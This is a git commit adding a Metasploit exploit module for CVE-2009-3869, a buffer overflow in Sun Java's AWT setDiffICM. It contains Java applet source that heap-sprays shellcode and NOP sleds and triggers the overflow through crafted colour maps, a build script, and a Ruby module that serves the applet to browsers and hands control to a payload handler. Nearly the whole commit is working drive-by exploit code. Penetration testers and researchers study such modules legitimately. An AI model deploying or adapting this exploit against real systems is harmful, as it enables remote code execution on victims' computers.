add exploit module for cve-2009-3869

NOTE: no policy change is required for this exploit to succeed. git-svn-id: file:///home/svn/framework3/trunk@7899 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-17 04:52:40 +00:00 · 2009-12-17 04:52:40 +00:00 · b37c34579b
parent d0a37bd506
commit b37c34579b
5 changed files with 391 additions and 0 deletions
--- a/data/exploits/CVE-2009-3869.jar
+++ b/data/exploits/CVE-2009-3869.jar
--- a/external/source/exploits/CVE-2009-3869/AppletX.java
+++ b/external/source/exploits/CVE-2009-3869/AppletX.java
@ -0,0 +1,160 @@
+//
+// $Id$
+// 
+// Version: $Revision$
+// 
+
+import java.awt.*;
+import java.awt.image.*;
+import java.nio.*;
+
+public class AppletX extends java.applet.Applet
+{
+	private IntBuffer [] mem;
+	private Image src, dst;
+	private boolean painted = false;
+	
+   public void init()
+     {
+		  // load image
+        src = getImage(getCodeBase(), "test.png");
+		  
+		  // wait for image to be loaded
+        MediaTracker mt = new MediaTracker(this);
+		  mt.addImage(src, 0);
+		  try { mt.waitForAll(); } catch (InterruptedException e) { }
+		  mt.removeImage(src);
+
+		  // create our filtered version (nasty one!)
+		  ImageProducer ip = src.getSource();
+		  ImageFilter iflt = new BoomFilter();
+		  dst = createImage(new FilteredImageSource(ip, iflt));
+		  
+		  try
+			 {
+				 mem = spray(getParameter("sc"), getParameter("np"));
+				 // System.out.println("Sprayed!");
+			 }
+		  catch (Exception e)
+			 {
+			 }
+		  
+		  // the vuln shall trigger itself auto-magically on render...
+     }
+	
+	public void paint(Graphics g)
+	  {
+		  if (!painted)
+			 {
+				 painted = true;
+				 if (src != null)
+					g.drawImage(src, 10, 10, this);
+				 if (dst != null)
+					g.drawImage(dst, 250, 10, this);
+			 }
+	  }
+	
+   // based on:
+	// http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java
+	public static short[] HexDecode(String s)
+	  {
+		  short[] data = new short[s.length()/2];
+		  
+		  for (int i = 0; i < s.length(); i += 2)
+			 {
+				 char c1 = s.charAt(i);
+				 char c2 = s.charAt(i + 1);
+				 
+				 int comb = Character.digit(c1, 16) & 0xff;
+				 comb <<= 4;
+				 comb += Character.digit(c2, 16) & 0xff;
+				 data[i/2] = (short)comb;
+			 }
+		  return data;
+	  }
+	
+	public final IntBuffer [] spray(String sc, String np)
+	  {
+		  short [] sc_bytes = HexDecode(sc);
+		  short [] np_bytes = HexDecode(np);
+		  
+		  return spray (sc_bytes, np_bytes);
+	  }
+	
+	public final IntBuffer [] spray(short[] sc, short[] np)
+	  {
+		  int cnt = 50; // total 50 mb
+		  int sz = 1024*1024; // 1 mb
+		  int nops = (sz / 4) - (sc.length);
+		  
+		  IntBuffer [] ret = new IntBuffer[cnt];
+		  
+		  for (int bi = 0; bi < cnt; bi++)
+			 {
+				 IntBuffer ib = IntBuffer.allocate(sz / 4);
+
+				 for (int i = 0; i < nops; ++i)
+					ib.put((np[0]
+							  | (np[1] << 8)
+							  | (np[2] << 16)
+							  | (np[3] << 24)));
+				 // ib.put(0x90909090);
+		  
+				 for (int i = 0; i < sc.length; )
+					ib.put((sc[i++]
+							  | (sc[i++] << 8)
+							  | (sc[i++] << 16)
+							  | (sc[i++] << 24)));
+				 ret[bi] = ib;
+			 }
+		  return ret;
+	  }
+}
+
+
+class BoomFilter extends java.awt.image.ImageFilter
+{
+	public void setDimensions(int width, int height)
+	  {
+		  // System.out.println("in setDimensions");
+		  consumer.setDimensions(width, height);
+		  
+		  // pixels...
+		  int PXSZ = 100*100;
+		  byte[] px = new byte[PXSZ];
+		  for (int i = 0; i < PXSZ; i++)
+			 px[i] = 0x00;
+		  
+		  // our length
+		  int SZ1 = 0xff;
+		  int SZ2 = 0x800;
+		  ColorModel cm;
+		  
+		  // here we setup two color maps.
+		  // the first one is used to control what values are written to in the second one.
+
+		  int[] rgba = new int[SZ1];
+		  for (int i = 0; i < SZ1; i++)
+			 rgba[i] = 0xff010203 + i;
+		  rgba[0x01] = 0xff020202;
+		  rgba[0x24] = 0xff020203;
+		  cm = new IndexColorModel(8, SZ1, rgba, 0, false, -1, DataBuffer.TYPE_BYTE);
+		  consumer.setColorModel(cm);
+		  
+		  // trigger the bug
+		  rgba = new int[SZ2];
+		  // everything from the first buffer must be found to trigger the overflow
+		  for (int i = 0; i < SZ1; i++)
+			 rgba[i] = 0xff010203 + i;
+		  rgba[0x01] = 0xff020202;
+		  rgba[0x24] = 0xff020203;
+		  for (int i = SZ1; i < SZ2 - 1; i += 2)
+			 {
+				 rgba[i] = 0xff020203;
+				 rgba[i+1] = 0xff020202;
+			 }
+		  cm = new IndexColorModel(8, SZ2, rgba, 0, false, -1, DataBuffer.TYPE_BYTE);
+		  
+		  consumer.setPixels(10, 10, 10, 10, cm, px, 1, 1);
+	  }
+}
--- a/external/source/exploits/CVE-2009-3869/compile.sh
+++ b/external/source/exploits/CVE-2009-3869/compile.sh
@ -0,0 +1,8 @@
+#!/bin/sh
+
+javac -target 1.3 -source 1.3 AppletX.java
+
+jar cvf CVE-2009-3869.jar AppletX.class BoomFilter.class test.png
+rm -f AppletX.class BoomFilter.class
+
+mv CVE-2009-3869.jar ../../../../data/exploits/CVE-2009-3869.jar
--- a/external/source/exploits/CVE-2009-3869/test.png
+++ b/external/source/exploits/CVE-2009-3869/test.png
--- a/modules/exploits/multi/browser/java_setdifficm_bof.rb
+++ b/modules/exploits/multi/browser/java_setdifficm_bof.rb
@ -0,0 +1,223 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	#
+	# This module acts as an HTTP server
+	#
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Sun Java JRE AWT setDiffICM Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a flaw in the setDiffICM function in the Sun JVM.
+				
+				The payload is serialized and passed to the applet via PARAM tags. It must be
+				a native payload.
+				
+				The effected Java versions are JDK and JRE 6 Update 16 and earlier, 
+				JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and
+				earlier, and SDK and JRE 1.3.1_26 and earlier.
+				
+				NOTE: Although all of the above versions are reportedly vulnerable, only
+				1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>  
+				[
+					'jduck'
+				],
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
+					[ 'CVE', '2009-3869' ],
+					[ 'OSVDB', '59710' ],
+	  				[ 'BID', '36881' ],
+					[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-078/' ],
+				],
+			'Payload'        =>
+				{
+					'Space'    => 1024,
+					'BadChars' => '',
+					'DisableNops' => true,
+				},
+			'Targets'        =>
+				[
+=begin
+
+No automatic targetting for now ...
+
+					[ 'J2SE 1.6_16 Automatic',
+						{
+							'Platform' => ['win', 'linux', 'osx'],
+							'Arch' => [ARCH_X86, ARCH_PPC]
+						}
+					],
+=end
+					[ 'J2SE 1.6_16 on Windows x86', 
+						{
+							'Platform' => 'win',
+							'Arch' => ARCH_X86
+						}
+					],
+					[ 'J2SE 1.6_16 on Mac OS X PPC', 
+						{
+							'Platform' => 'osx',
+							'Arch' => ARCH_PPC,
+						}
+					],
+					[ 'J2SE 1.6_16 on Mac OS X x86', 
+						{
+							'Platform' => 'osx',
+							'Arch' => ARCH_X86,
+						}
+					],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Nov 04 2009'
+			))
+	end
+	
+	
+	def on_request_uri(cli, req)
+		
+		# Create a cached mapping between IP and detected target
+		@targetcache ||= {}
+		@targetcache[cli.peerhost] ||= {}
+		@targetcache[cli.peerhost][:update] = Time.now.to_i
+
+		if (target.name =~ /Automatic/) 
+			case req.headers['User-Agent']
+			when /Windows/i
+				print_status("Choosing a Windows target for #{cli.peerhost}:#{cli.peerport}...")
+				@targetcache[cli.peerhost][:target] = self.targets[1]
+			when /PPC Mac OS X/i
+				print_status("Choosing a Mac OS X PPC target for #{cli.peerhost}:#{cli.peerport}...")
+				@targetcache[cli.peerhost][:target] = self.targets[2]			
+			when /Intel Mac OS X/i
+				print_status("Choosing a Mac OS X x86 target for #{cli.peerhost}:#{cli.peerport}...")
+				@targetcache[cli.peerhost][:target] = self.targets[3]
+			else
+				print_status("Unknown target for: #{req.headers['User-Agent']}")
+			end
+		end
+
+		# Clean the cache 
+		rmq = []
+		@targetcache.each_key do |addr|
+			if (Time.now.to_i > @targetcache[addr][:update]+60)
+				rmq.push addr
+			end
+		end
+				
+		rmq.each {|addr| @targetcache.delete(addr) }
+	
+	
+		# Request processing
+		if (not req.uri.match(/\.jar$/i))
+		
+			# Redirect to the base directory so the applet code loads...
+			if (not req.uri.match(/\/$/))
+				print_status("Sending redirect so path ends with / ...")
+				send_redirect(cli, get_resource() + '/', '')
+				return
+			end
+		
+			# Display the applet loading HTML
+			print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
+			send_response_html(cli, generate_html(payload.encoded),
+				{
+					'Content-Type' => 'text/html',
+					'Pragma' => 'no-cache'
+				})
+			return
+		end
+		
+		# Send the actual applet over
+		print_status("Sending applet to #{cli.peerhost}:#{cli.peerport}...")
+		send_response(cli, generate_applet(cli, req), 
+			{
+				'Content-Type' => 'application/octet-stream',
+				'Pragma' => 'no-cache'
+			})
+
+		# Handle the payload
+		handler(cli)
+	end
+
+
+	def generate_html(pl)
+
+		html = %Q|<html>
+ <head>
+  <!-- <meta http-equiv=refresh content=10 /> -->
+ </head>
+ <body>
+  <applet width='100%' height='100%' code='AppletX' archive='CVE-2009-3869.jar'>
+   <param name='sc' value='SCODE' />
+   <param name='np' value='NOPS' />
+  </applet>
+ </body>
+</html>
+|
+		# ugh.. pain
+		debug_payload = false
+		pload = ""
+		pload << "\xcc" if debug_payload
+		pload << pl
+		if ((pload.length % 4) > 0)
+			pload << rand_text((4 - (pload.length % 4)))
+		end
+		if debug_payload
+			print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))
+		end
+		html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))
+		
+		nops = "\x90\x90\x90\x90"
+		html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))
+		#print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))
+		
+		return html
+
+	end
+
+
+	def generate_applet(cli, req)
+
+		this_target = nil
+		if (target.name =~ /Automatic/) 
+			if (@targetcache[cli.peerhost][:target])
+				this_target = @targetcache[cli.peerhost][:target]
+			else
+				return ''
+			end
+		else
+			this_target = target
+		end
+
+		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2009-3869.jar")
+
+		fd = File.open(path, "rb")
+		data = fd.read
+		fd.close
+		
+		return data
+	end	
+
+end